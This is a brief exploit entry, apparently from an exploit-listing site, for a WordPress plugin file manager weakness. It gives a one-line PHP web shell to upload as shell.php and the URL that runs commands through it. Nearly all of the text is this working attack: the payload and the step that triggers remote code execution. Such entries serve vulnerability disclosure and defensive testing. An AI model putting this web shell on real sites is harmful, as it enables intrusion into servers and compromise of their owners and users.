## https://sploitus.com/exploit?id=WPEX-ID:7FA03F00-25C7-4E40-8592-BB4001CE019D
As an admin, use the File Manager UI to upload a file `shell.php` with the following contents:
<?php echo system($_GET['cmd']);
Visit `/shell.php?cmd=id` to trigger RCE.